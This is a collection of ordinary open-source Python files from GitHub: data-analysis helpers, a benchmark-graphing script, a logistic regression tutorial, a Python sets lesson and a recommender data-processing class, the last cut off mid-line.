Mencetak pindah baris setelah setiap baris selesai dicetak\n print()","repo_name":"abdullahalwafi/ddp","sub_path":"praktikum2/cetakpersegi.py","file_name":"cetakpersegi.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32608969372","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt, rcParams, rcParamsDefault\nfrom itertools import cycle\n\nimport mofr.metrics as metrics\nfrom mofr.evaluator import Evaluator\nfrom mofr.basic_evaluators.settings import figsize_, colors_\n\n\nclass HistogramContinuousEvaluator(Evaluator):\n\n def __init__(self, data=None, predictor_column=None):\n \"\"\"\n data: The pandas dataframe containing all the necessary columns.\n\n predictor_column: The name of the column containing the categorical predictor.\n There should be no more than 20 unique categories for this perecdictor. Binning should be used\n for predictors with higher number of unique categories. The predictor should be in string format or \n at least convertible into string.\n \"\"\"\n self.data=data\n self.predictor_column=predictor_column\n \n def d(self, data=None):\n self.data=data\n return self \n\n def pc(self, predictor_column=None):\n self.predictor_column=predictor_column\n return self \n\n\n def get_graph(self, plot=True):\n\n # setup plot details\n rcParams.update(rcParamsDefault)\n f, ax = plt.subplots(figsize=figsize_)\n \n #set up data details\n df_=self.data\n df_[self.predictor_column]=df_[self.predictor_column].apply(float)\n\n # produce histogram\n n, bins, patches = plt.hist(df_[self.predictor_column], bins='doane', density=False, facecolor='b', alpha=0.75, edgecolor='black', axes=ax)\n\n plt.xlabel('Values', axes=ax)\n plt.ylabel('Number of observations', axes=ax)\n plt.title(f'Histogram of predictor \"{self.predictor_column}\"', axes=ax)\n ax.grid(True)\n\n if plot==True:\n plt.show() \n\n self.graph=f\n self.axis=ax\n\n plt.close() \n\n return self\n \n\n def get_table(self):\n #percentile functions for the pivot table\n def percentile_10(x):\n return np.percentile(x,10)\n def percentile_25(x):\n return np.percentile(x,25)\n def percentile_50(x):\n return np.percentile(x,50)\n def percentile_75(x):\n return np.percentile(x,75)\n def percentile_90(x):\n return np.percentile(x,90)\n \n #set up data details\n df_=self.data\n df_[self.predictor_column]=df_[self.predictor_column].apply(float)\n df_['']=self.predictor_column\n categories=['percentile_10', 'percentile_25', 'percentile_50', 'percentile_75', 'percentile_90']\n n_categories=len(categories)\n\n # produce table of distribution/share in time\n pt=pd.pivot_table(df_, values=self.predictor_column, index='', columns=None, aggfunc=[percentile_10,percentile_25,percentile_50, percentile_75, percentile_90], fill_value=None, margins=False, dropna=True, margins_name='All')\n pt.columns=[pt.columns[x][0] for x in range(len(pt.columns))]\n pt=pt.transpose()\n\n #produce table of distribution/share of each category in time\n final_table=pt.style.set_table_attributes(\"style='display:inline'\").set_caption(f'Percentiles of predictor \"{self.predictor_column}\"') \n self.table=final_table\n \n return self","repo_name":"Vrboska/mofr","sub_path":"mofr/basic_evaluators/HistogramContinuous.py","file_name":"HistogramContinuous.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8699996507","text":"import pandas as pd\n\ndata = \"https://bites-data.s3.us-east-2.amazonaws.com/summer.csv\"\n\n\ndef athletes_most_medals(data: str = data) -> pd.Series:\n df = pd.read_csv(data)\n men = df[df[\"Gender\"] == \"Men\"]\n women = df[df[\"Gender\"] == \"Women\"]\n\n medal_dict = {}\n woman_name, woman_count = women[\"Athlete\"].value_counts().index[0], women[\"Athlete\"].value_counts()[0]\n man_name, man_count = men[\"Athlete\"].value_counts().index[0], men[\"Athlete\"].value_counts()[0]\n medal_dict[woman_name] = woman_count\n medal_dict[man_name] = man_count\n return medal_dict\n\n\nif __name__ == \"__main__\":\n print(athletes_most_medals())","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/140/medals.py","file_name":"medals.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20368035604","text":"#!/usr/bin/env python3\nimport os\nfrom collections import defaultdict, namedtuple\nimport argparse\nimport re\nimport plotly\n\n\nBenchmarkResults = namedtuple('BenchmarkResults', ['data', 'sizes_in_bytes', 'cardinalities'])\n\n\ndef main():\n argparser = argparse.ArgumentParser(description='Graphs the results of running the benchmarks')\n argparser.add_argument('--file', type=str, help='Path to the file that contains the benchmark output')\n argparser.add_argument('--min_elements', type=int, default=0, help='The minimum container size to graph; 0 for no minimum')\n argparser.add_argument('--max_elements', type=int, default=0, help='The maximum container size to graph; 0 for no maximum')\n args = argparser.parse_args()\n\n with open(args.file) as out_file:\n results = parse_benchmark_results(out_file.readlines(), args.min_elements, args.max_elements)\n graph_results(results, 'out')\n\n\ndef parse_benchmark_results(benchmark_output, min_elements=None, max_elements=None):\n \"\"\"\n :type benchmark_output list[str]\n :type min_elements int|None\n :type max_elements int|None\n :rtype BenchmarkResults\n :return The parsed benchmark results file. The data member dict looks like this:\n {\n benchmark_function_str: {\n data_size_int: {\n container_type_str: {\n num_elements_int: cpu_time_nanoseconds\n }\n }\n }\n }\n While the sizes_in_bytes and cardinalities members are sorted lists.\n \"\"\"\n def data_type_to_size(data_type):\n if data_type == \"int\":\n return 4\n elif data_type == \"size_16\":\n return 16\n elif data_type == \"size_64\":\n return 64\n raise Exception(\"Unknown type \" + data_type)\n\n # Regex for individual iterations of the benchmark\n # Group 1: benchmark function name, e.g., BM_vector_sequential_read\n # Group 2: container type, e.g., FixedArray\n # Group 3: data type, e.g., int or size_16\n # Group 4: number of elements, between 4 and 16384\n # Group 5: clock time in ns\n # Group 6: CPU time in ns\n # Group 7: iteration count\n benchmark_re = re.compile(r\"^(\\w+)<([\\w<>:, ]+), (\\w+)>\\/(\\d+)\\s+(\\d+) ns\\s+(\\d+) ns\\s+(\\d+)$\")\n\n data = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(int))))\n data_sizes = set()\n cardinalities = set()\n\n for line in benchmark_output:\n match = benchmark_re.match(line)\n if match:\n benchmark_fn = match.group(1)\n container_type = match.group(2)\n if container_type.startswith('std_'):\n container_type = container_type.replace('std_', 'std::')\n\n data_size = data_type_to_size(match.group(3))\n num_elements = int(match.group(4))\n cpu_time = int(match.group(6))\n meets_min_requirements = not min_elements or num_elements >= min_elements\n meets_max_requirements = not max_elements or num_elements <= max_elements\n if meets_min_requirements and meets_max_requirements:\n data[benchmark_fn][data_size][container_type][num_elements] = cpu_time\n data_sizes.add(data_size)\n cardinalities.add(num_elements)\n return BenchmarkResults(data=data, sizes_in_bytes=sorted(data_sizes), cardinalities=sorted(cardinalities))\n\n\ndef graph_results(benchmark_results, out_dir):\n \"\"\"\n :type benchmark_results: BenchmarkResults\n :type out_dir str\n \"\"\"\n def name_file(benchmark_function_name, data_size, max_container_size):\n type = None\n for potential_type in ['vector', 'set', 'map']:\n if (\"_%s_\" % potential_type) in benchmark_function_name:\n type = potential_type\n break\n\n op_decoder = {\n 'rand_read': 'Random reads',\n 'sequential_read': 'Sequential reads',\n 'insert': 'Insertion',\n 'lookup': 'Random lookup',\n 'set_read': 'Random lookup',\n }\n for function_partial_name, decoded in op_decoder.items():\n if function_partial_name in benchmark_function_name:\n return \"%s in %ss up to %d elements (%d byte data).png\" % (decoded, type, max_container_size, data_size)\n return \"%s_data_size_%d.png\" % (benchmark_fn, data_size)\n\n try:\n os.makedirs(out_dir)\n except os.error:\n pass\n\n for benchmark_fn, data_sizes_for_fn in benchmark_results.data.items():\n for data_size, container_types_at_size in data_sizes_for_fn.items():\n # Make a graph of the time required of each container type with this data size and any number of elements\n max_cardinality = 0\n traces = []\n for container_type, num_elements_for_container in container_types_at_size.items():\n times = [] # CPU time in nanoseconds\n for cardinality in benchmark_results.cardinalities:\n times.append(num_elements_for_container[cardinality])\n max_cardinality = max(max_cardinality, cardinality)\n traces.append(plotly.graph_objs.Scatter(\n x=benchmark_results.cardinalities,\n y=times,\n mode='lines+markers',\n name=container_type\n ))\n layout = plotly.graph_objs.Layout(\n title=\"%s() Time (at %d Byte Data Size) by Number of Elements\" % (benchmark_fn, data_size),\n xaxis=dict(title='Number of Elements in the Container'),\n yaxis=dict(title='Time (nanoseconds)')\n )\n figure = plotly.graph_objs.Figure(data=traces, layout=layout)\n # plotly.offline.plot(figure,\n # filename=\"%s_data_size_%d.html\" % (benchmark_fn, data_size),\n # auto_open=False)\n plotly.io.write_image(figure, os.path.join(out_dir,\n name_file(benchmark_fn, data_size, max_cardinality)))\n\n # We need separate graphs by container size.\n # E.g., if you know your container will have 8 elements, here's the fastest container for iteration.\n # If you know it'll have 1,000, loook at the other graph.\n # Graphs plot the time required by data size for each container\n\n\ndef debug_dump_data(data):\n for benchmark_fn, data_by_container_type in data.items():\n print(benchmark_fn + \":\")\n for container_type, data_by_size in data_by_container_type.items():\n print(\"\\t\", container_type)\n for size, data_by_num_elements in data_by_size.items():\n print(\"\\t\\tData size\", size)\n for elements, cpu_time_ns in data_by_num_elements.items():\n print(\"\\t\\t\\t\", elements, \":\", cpu_time_ns)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"s3cur3/llvm-data-structure-benchmarks","sub_path":"scripts/graph_results.py","file_name":"graph_results.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"5227077570","text":"import os\nfrom pathlib import Path\nimport json\n\nfrom devtools import debug\n\n# from fractal_tasks_core.create_ome_zarr import create_ome_zarr\n# from fractal_tasks_core.yokogawa_to_ome_zarr import yokogawa_to_ome_zarr\nfrom scmultiplex_feature_measurements import scmultiplex_measurements\n\n# zarr_path = \"/Users/joel/shares/workShareJoel/v1_fractal/fractal-demos/examples/02_cardio_small/tmp_cardio-2x2-testing/output/\"\n# metadata_path = \"/Users/joel/shares/homeShareFractal/joel/fractal_v1/fractal-demos/examples/server/{artifacts-110}/workflow_000007_job_000006/metadata.json\"\n# metadata_path = \"/Users/joel/shares/homeShareFractal/joel/fractal_v1/fractal-demos/examples/server/{artifacts-110}/workflow_000007_job_000006/metadata_3D.json\"\n\nzarr_path = \"/Users/joel/Dropbox/Joel/FMI/Code/fractal/fractal-demos/examples/01_cardio_tiny_dataset/tmp_cardiac-tiny-scMultiplex/output/\"\nmetadata_path = \"/Users/joel/Dropbox/Joel/FMI/Code/fractal/fractal-demos/examples/server/artifacts/workflow_000015_job_000015/metadata.json\" \n\nwith open(metadata_path) as json_file:\n metadata = json.load(json_file)\n\n\ninput_channels = {\n \"C01\": {\"wavelength_id\": \"A01_C01\"}, \n # \"C02\": {\"wavelength_id\": \"A01_C02\"}, \n # \"C03\": {\"wavelength_id\": \"A02_C03\"}, \n}\nlabel_image = 'nuclei'\noutput_table_name = 'table_scmultiplex_refactor2'\nmeasure_morphology = True\nlevel = 0\nlabel_level = 0\n\n# scmultiplex task running on existing Zarr file:\nfor component in metadata[\"image\"]:\n scmultiplex_measurements(\n input_paths=[zarr_path],\n output_path=zarr_path,\n metadata=metadata,\n component=component,\n input_ROI_table = \"well_ROI_table\", #\"well_ROI_table\", #\"FOV_ROI_table\",\n input_channels = input_channels,\n label_image = label_image,\n label_level = label_level,\n level = level,\n output_table_name = output_table_name,\n measure_morphology = measure_morphology,\n )\n\n","repo_name":"fmi-basel/gliberal-scMultipleX","sub_path":"src/scmultiplex/fractal/run_measurement.py","file_name":"run_measurement.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"23982830702","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py # 为了使用h5的数据集\nfrom lr_utils import load_dataset \n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n'''\n train_set_x_orig 训练集x的图像数据\n train_set_y 训练集y的二分值 [0, 1]\n test_set_x_orig 测试集x的图像数据\n test_set_y 测试集y的二分值 [0, 1]\n classes 保存以bytes类型的两个字符串数据\n'''\nm_train = train_set_y.shape[1] # 训练集里面照片的数量\n# 因为train_y.shape(1, m)\nm_test = test_set_y.shape[1] # 测试集里面照片的数量\n# 因为test_y.shape(1, m)\nnum_px = train_set_x_orig.shape[1] # 训练、测试集里面的图片的宽度和高度\n\nprint(\"训练集的数量: m_train = \" + str(m_train))\nprint(\"测试集的数量: m_test = \" + str(m_test))\nprint(\"每张图片的宽/高 : num_px = \" + str(num_px))\nprint(\"每张图片的大小: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\nprint(\"训练集_图片的维度: \" + str(train_set_x_orig.shape))\nprint(\"训练集_标签的维度: \" + str(train_set_y.shape))\nprint(\"测试集_图片的维度: \" + str(test_set_x_orig.shape))\nprint(\"测试集_标签的维度: \" + str(test_set_y.shape))\n\n# 将训练集的维度降低并转置\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\n# 将测试集的维度降低并转置\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n# 在reshape中-1就是让解释器去运算数组变成矩阵后有多少列。而ndarray.T就是转置\n\nprint(\"----------------------------------------------------------\")\nprint(\"训练集降维最后的维度: \" + str(train_set_x_flatten.shape))\nprint(\"训练集_标签的维度: \" + str(train_set_y.shape))\nprint(\"测试集降维最后的维度: \" + str(test_set_x_flatten.shape))\nprint(\"测试集_标签的维度: \" + str(test_set_y.shape))\n\n'''\n 为了显示色彩,我们需要将矩阵的每一个数据集除以255\n 因为色彩的表示是用RGB通道,像素值在区间[0, 255]因此,除以255能够让数据位于[0, 1]区间\n'''\ntrain_set_x = train_set_x_flatten / 255\ntest_set_x = test_set_x_flatten / 255\n\n# 到这里,数据的准备就完成了\n\ndef sigmoid(z) :\n \"\"\"\n param :\n z -- 任何大小的标量或numpy数组\n \n return var :\n s -- sigmoid(z)\n \"\"\"\n s = 1 / (1 + np.exp(-z))\n return s\n\ndef initialize_zeros(dim) :\n \"\"\"\n 此函数为dw创建一个维度为(dim, 1)的0向量,并将db初始化为0\n param :\n dim -- 我们想要的dw矢量大小\n \n return var :\n dw -- 维度为(dim, 1)的初始化向量\n db -- 初始化的标量(对应于偏差)\n \"\"\"\n dw = np.zeros((dim, 1))\n db = 0\n \n assert(dw.shape == (dim, 1))\n assert(isinstance(db, float) or isinstance(db ,int))\n return (dw, db)\n\ndef propagate(w, b, X, Y) :\n \"\"\"\n 实现前向和后向传播的成本函数以及梯度下降\n param :\n w -- 权重,大小不等的数组(num_px * num_px * 3, 1)\n b -- 偏差,一个标量\n X -- 矩阵类型为(num_px * num_px * 3, m)\n Y -- 真正的\"标签\"矢量,矩阵维度为(1, m)\n \n return var :\n cost -- Logistic Regression cost function\n dw -- 相对于w的损失梯度,因此与w相同的形状\n db -- 相对于b的损失梯度,因此与b相同的形状\n \"\"\"\n m = X.shape[1]\n \n # 正向传播\n A = sigmoid(np.dot(w.T, X) + b) # 计算激活函数值\n cost = (- 1 / m) * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A)) # 计算成本函数\n \n # 反向传播\n dw = (1 / m) * np.dot(X, (A - Y).T)\n db = (1 / m) * np.sum(A - Y)\n \n # 判断数据\n assert(dw.shape == w.shape)\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n \n # 创建字典,保存dw,db\n grads = {\n \"dw\" : dw, \n \"db\" : db\n }\n return (grads, cost)\n\ndef optimize(w, b, X, Y, num_iterations, learning_rate, print_cost = False) :\n \"\"\"\n 此函数通过运行梯度下降算法来优化w和b\n param :\n w -- 权重,大小不等的数组(num_px * num_px * 3, 1)\n b -- 偏差,一个标量\n X -- 维度为(num_px * num_px * 3, m)\n Y -- 真正的\"标签\"矢量,矩阵维度为(1, m)\n num_iterations -- 优化循环的迭代次数\n learning_rate -- 梯度下降更新规则的学习率\n print_cost -- 每一百步打印一次损失值\n \n return var :\n params -- 包含权重w和偏差b的字典\n grads -- 包含权重和偏差相对于成本函数梯度下降的字典\n 成本 -- 优化期间计算的所有成本列表��将用于绘制学习曲线\n \n tips :\n 我们需要写下两步并遍历 :\n 1) 计算当前参数的成本和剃度下降,使用propagate()\n 2) 使用w和b的梯度下降更新参数\n \"\"\"\n \n costs = []\n \n for i in range(num_iterations) :\n grads, cost = propagate(w, b, X, Y)\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n w = w - learning_rate * dw\n b = b - learning_rate * db\n \n # 记录成本\n if i % 100 == 0 :\n costs.append(cost)\n # 打印成本数据 -- 100步打印一次\n if (print_cost) and (i % 100 == 0) :\n print(\"迭代的次数: %i, 误差值: %f\"% (i, cost))\n \n params = {\n \"w\" : w,\n \"b\" : b\n }\n grads = {\n \"dw\" : dw,\n \"db\" : db\n }\n return (params, grads, costs)\n\ndef predict (w, b, X) :\n \"\"\"\n 使用学习逻辑回归参数logistic(w, b) 预测标签是0还是1\n param :\n w -- 权重,大小不等的数组(num_px * num_px * 3, 1)\n b -- 偏差,一个标量\n X -- 维度为(num_px * num_px * 3, m)\n \n return var :\n Y_prediction -- 包含X中所有图片的预测值的一个numpy数组\n \"\"\"\n \n m = X.shape[1] # 图片的数量\n Y_prediction = np.zeros((1, m))\n w = w.reshape(X.shape[0], 1)\n \n # 计算预测猫在图片中出现的概率\n A = sigmoid(np.dot(w.T, X) + b)\n for i in range(A.shape[1]) :\n # 将概率a[0, i]转换为实际预测p[0, i]\n Y_prediction[0, i] = 1 if A[0, i] > 0.5 else 0\n # 如果实际概率大于0.5就认为是猫\n \n # 判断数据\n assert (Y_prediction.shape == (1, m))\n \n return Y_prediction\n\ndef model(X_train, Y_train, X_test, Y_test, num_iterations = 2000, learning_rate = 0.5, print_cost = False) :\n \"\"\"\n 通过调用之前实现的函数来构建逻辑回归模型\n param :\n X_train -- numpy的数组,维度为(num_px * num_px * 3, m_train)的训练集\n Y_train -- numpy的数组,维度为(1, m_train)(矢量)的训练标签集\n X_test -- numpy的数组,维度为(num_px * num_px * 3, m_train)的测试集\n Y_test -- numpy的数组,维度为(1, m_test)(向量)的测试标签集\n num_iterations -- 表示用于优化的迭代次数的超参数\n learning_rate -- 表示optimize() 更新规则中使用的学习速率的超参数\n print_cost -- 设置为True以100为频率迭代打印成本\n \n return var :\n d -- 包含有关模型信息的字典\n \"\"\"\n \n w, b = initialize_zeros(X_train.shape[0])\n \n parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)\n \n # 从字典参数中检索参数w和b\n w, b = parameters[\"w\"], parameters[\"b\"]\n \n # 预测测试/训练集的例子\n Y_prediction_test = predict(w, b, X_test)\n Y_prediction_train = predict(w, b, X_train)\n \n # 打印训练后的准确性\n print(\"训练集准确性: \", format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100), \"%\")\n print(\"测试集准确性: \", format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100), \"%\")\n \n d = {\n \"costs\" : costs,\n \"Y_prediction_test\" : Y_prediction_test,\n \"Y_prediction_train\" : Y_prediction_train,\n \"w\" : w,\n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\" : num_iterations\n }\n return d\n\nd = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations = 2000, learning_rate = 0.005, print_cost = True)\n\n# 绘制图像\ncosts = np.squeeze(d[\"costs\"])\nplt.plot(costs)\nplt.ylabel(\"cost\", size= 14)\nplt.xlabel(\"iterations (per hundreds)\", size = 14)\nplt.title(\"Learning rate = \" + str(d[\"learning_rate\"]), fontsize = 20)\nplt.savefig(\"Learning Rate.jpg\")\nplt.show()","repo_name":"ChenMiaoi/codeProgram","sub_path":"python/deepinglearning/NeuralNetWorks/LogisticRegression_src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8693,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"20029345767","text":"'''\nSet\nSets are used to store multiple items in a single variable.\n\nSet is one of 4 built-in data types in Python used to store collections of data, the other 3 are List, Tuple, and Dictionary, all with different qualities and usage.\n\nA set is a collection which is unordered, unchangeable*, and unindexed.\n\n* Note: Set items are unchangeable, but you can remove items and add new items.\n\nSets are written with curly brackets.\n'''\n\n# Create a Set:\n\nthisset = {\"apple\", \"banana\", \"cherry\"}\nprint(thisset)\n\n# Duplicate values will be ignored:\n\nthisset = {\"apple\", \"banana\", \"cherry\", \"apple\"}\n\nprint(thisset)\n\n# Get the number of items in a set:\n\nthisset = {\"apple\", \"banana\", \"cherry\"}\n\nprint(len(thisset))\n\n# String, int and boolean data types:\n\nset1 = {\"apple\", \"banana\", \"cherry\"}\nset2 = {1, 5, 7, 9, 3}\nset3 = {True, False, False}\n\n# A set with strings, integers and boolean values:\n\nset1 = {\"abc\", 34, True, 40, \"male\"}\ntype()\n\n# What is the data type of a set?\n\nmyset = {\"apple\", \"banana\", \"cherry\"}\nprint(type(myset))\n\n# Using the set() constructor to make a set:\n\nthisset = set((\"apple\", \"banana\", \"cherry\")) # note the double round-brackets\nprint(thisset)\n","repo_name":"bogaraviteja/python-basics","sub_path":"python/03_data_structures/03_sets/01_sets.py","file_name":"01_sets.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9502751695","text":"import math\nimport random\nimport sqlite3\nfrom typing import List\n\nimport numpy\nimport pandas\nfrom pandas import DataFrame\nfrom tqdm import tqdm\n\nfrom data_process.data_reader.data_enum import DataSetEnum, DataTypeEnum, REVIEW_COUNT, RANDOM_STATE, get_all_dataset\nfrom data_process.data_reader.process_raw_data import load_processed_data, split_train_dev_test_data\nfrom data_process.data_reader.train_data_file import TrainDataFile, TRAIN_DATA_PATH\nfrom tool.log_helper import logger\nfrom tool.path_helper import ROOT_DIR\n\n\nclass DataUtil:\n def __init__(self, data: DataFrame, known_data: DataFrame,\n data_set: DataSetEnum, data_type: DataTypeEnum):\n\n self.data = data\n self.known_data = known_data\n self.data_set = data_set\n self.data_type = data_type\n\n self.table_name = data_set.value\n self.db_conn = self.create_memory_db()\n self.rand = random.Random(RANDOM_STATE)\n\n self.review_cache, self.rating_cache = self.get_review_rating_cache()\n self.user_sim_cache = dict()\n\n def __del__(self):\n # delete in-memory db\n self.db_conn.close()\n\n def create_memory_db(self):\n logger.info(f\"creating in-memory db {self.table_name}...\")\n conn = sqlite3.connect(':memory:')\n c = conn.cursor()\n self.known_data[[\"userID\", \"itemID\", \"rating\"]].to_sql(self.table_name, conn, index=False)\n c.execute(f\"CREATE INDEX user_idx on {self.table_name} (userID)\")\n c.execute(f\"CREATE INDEX item_idx on {self.table_name} (itemID)\")\n c.execute(f\"CREATE INDEX user_item_idx on {self.table_name} (userID, itemID)\")\n conn.commit()\n return conn\n\n def get_review_rating_cache(self):\n logger.info(f\"creating review and rating cache...\")\n review_cache, rating_cache = dict(), dict()\n iterator = zip(self.known_data[\"userID\"], self.known_data[\"itemID\"], self.known_data[\"review\"], self.known_data[\"rating\"])\n for user, item, review, rating in iterator:\n if user in review_cache:\n review_cache[user][item] = review\n rating_cache[user][item] = rating\n\n else:\n review_cache[user] = {item: review}\n rating_cache[user] = {item: rating}\n return review_cache, rating_cache\n\n def create_data_file(self):\n data_len = len(self.data)\n train_data = TrainDataFile(self.data_set, self.data_type)\n train_data.create_file(data_len)\n\n for idx, row in tqdm(enumerate(self.data.itertuples()), total=data_len, desc=\"Generating Train Data\"):\n user, item = row.userID, row.itemID\n train_data.user_id[idx] = user\n train_data.item_id[idx] = item\n train_data.rating[idx] = row.rating\n self.write_review_in_one(train_data, idx, user, item)\n self.write_self_review(train_data, idx, user, item)\n self.write_pos_review(train_data, idx, user, item)\n self.write_ref_review(train_data, idx, user, item)\n\n train_data.flush()\n logger.info(f\"Train file saved to {train_data.out_path}\")\n\n def write_self_review(self, train_data: TrainDataFile, idx, user, item):\n reviews, ids = self.get_user_item_review(user, item, \"user_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.user_review[idx, 0:chunk_len] = reviews\n train_data.reviewed_item[idx, 0:chunk_len] = ids\n\n reviews, ids = self.get_user_item_review(item, user, \"item_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.item_review[idx, 0:chunk_len] = reviews\n train_data.reviewing_user[idx, 0:chunk_len] = ids\n\n def get_user_item_review(self, query_id: int, exclude_id: int, review_type: str):\n\n if review_type == \"user_review\":\n query_key = \"userID\"\n exclude_key = \"itemID\"\n user_id_index = 0\n item_id_index = 1\n else:\n query_key = \"itemID\"\n exclude_key = \"userID\"\n user_id_index = 1\n item_id_index = 0\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select {query_key}, {exclude_key} \"\n f\"from {self.table_name} \"\n f\"where {query_key} == {query_id} and {exclude_key} != {exclude_id}\")\n\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, REVIEW_COUNT)\n\n reviews, ids = [], []\n for row in cursor:\n reviews.append(self.review_cache[row[user_id_index]][row[item_id_index]])\n ids.append(row[1])\n\n return reviews, ids\n\n def write_review_in_one(self, train_data: TrainDataFile, idx, user, item):\n review, _ = self.get_user_item_review_in_one(user, item, \"user_review\")\n train_data.user_review_in_one[idx, 0:len(review)] = review\n\n review, _ = self.get_user_item_review_in_one(item, user, \"item_review\")\n train_data.item_review_in_one[idx, 0:len(review)] = review\n\n review = self.get_user_auxiliary_review_in_one(user, item)\n train_data.user_auxiliary_review_in_one[idx, 0:len(review)] = review\n\n review = self.get_user_supplementary_review_in_one(user, item)\n train_data.user_supplementary_review_in_one[idx, 0:len(review)] = review\n\n review = self.get_user_ref_review_in_one(user, item)\n train_data.user_ref_review_in_one[idx, 0:len(review)] = review\n\n def get_user_item_review_in_one(self, query_id: int, exclude_id: int, review_type: str):\n\n if review_type == \"user_review\":\n query_key = \"userID\"\n exclude_key = \"itemID\"\n else:\n query_key = \"itemID\"\n exclude_key = \"userID\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select userID, itemID \"\n f\"from {self.table_name} \"\n f\"where {query_key} == {query_id} and {exclude_key} != {exclude_id}\")\n\n reviews = self.read_review_in_one_from_db(cursor, REVIEW_COUNT)\n return reviews\n\n def get_user_auxiliary_review_in_one(self, user_id: int, exclude_item: int):\n review, still_need = self.get_user_auxiliary_review_in_one_diff(user_id, exclude_item, 0)\n\n # More auxiliary at rating + 1\n if still_need > 0:\n new_review, still_need = self.get_user_auxiliary_review_in_one_diff(user_id, exclude_item, 1, still_need)\n review.extend(new_review)\n\n # More auxiliary at rating - 1\n if still_need > 0:\n new_review, _ = self.get_user_auxiliary_review_in_one_diff(user_id, exclude_item, -1, still_need)\n review.extend(new_review)\n\n return review\n\n def get_user_auxiliary_review_in_one_diff(self, user_id: int, exclude_item: int, rating_diff: int, limit: int = REVIEW_COUNT):\n \"\"\"\n Query and read auxiliary review with given condition.\n :param user_id: User id.\n :param exclude_item: Item id.\n :param rating_diff: The rating difference. E.g.: 0 means same ratting.\n :param limit: How many reviews is needed.\n :return: review document, how many reviews is still needed.\n \"\"\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.itemID == y.itemID \"\n f\"where x.userID == {user_id} \"\n f\"and x.userID != y.userID \"\n f\"and y.rating == (x.rating + {rating_diff}) \"\n f\"and y.itemID != {exclude_item}\")\n\n reviews, review_count = self.read_review_in_one_from_db(cursor, limit)\n return reviews, limit - review_count\n\n def read_review_in_one_from_db(self, cursor, limit: int) -> (list, int):\n \"\"\"\n Read and join multi reviews into one document.\n :param cursor: Database query result.\n :param limit: How many reviews is needed.\n :return: review document, how many reviews read actually.\n \"\"\"\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, limit)\n reviews = []\n review_read = 0\n for row in cursor:\n review_read += 1\n review_i = self.review_cache[row[0]][row[1]]\n review_i = [word for word in review_i if word != 0] # Remove .\n reviews.extend(review_i)\n return reviews, review_read\n\n def get_user_supplementary_review_in_one(self, user_id: int, exclude_item: int):\n reviews = []\n bought_items = self.rating_cache[user_id].keys()\n for item_id in bought_items:\n if item_id != exclude_item:\n sim_buyers = self.get_similar_buyer(user_id, item_id)\n if len(sim_buyers) == 0:\n return []\n\n similarity = [self.get_user_similarity(user_id, sim_buyer) for sim_buyer in sim_buyers]\n max_index = numpy.argmax(similarity).item()\n reviews.append(self.review_cache[sim_buyers[max_index]][item_id])\n if len(reviews) >= REVIEW_COUNT:\n break\n\n review_in_one = []\n for r in reviews:\n review_in_one.extend([word for word in r if word != 0]) # Remove .\n return review_in_one\n\n def get_similar_buyer(self, user_id: int, item_id: int) -> List[int]:\n self_rating = self.rating_cache[user_id][item_id]\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select userID \"\n f\"from {self.table_name} \"\n f\"where itemID == {item_id} \"\n f\"and userId != {user_id} \"\n f\"and abs(rating - {self_rating}) <= 1\")\n return [row[0] for row in cursor]\n\n def get_user_similarity(self, user1: int, user2: int) -> float:\n if user1 == user2:\n logger.warning(\"Calculate similarity between same user.\")\n return 1\n\n key = (min(user1, user2), max(user1, user2))\n if key in self.user_sim_cache:\n return self.user_sim_cache[key]\n else:\n sim = self.cal_user_similarity(user1, user2)\n self.user_sim_cache[key] = sim\n return sim\n\n def cal_user_similarity(self, user1: int, user2: int) -> float:\n items1 = self.rating_cache[user1].keys()\n items2 = self.rating_cache[user2].keys()\n common_items = set(items1) & set(items2)\n\n ratings1 = numpy.array([self.rating_cache[user1][item] for item in items1])\n ratings2 = 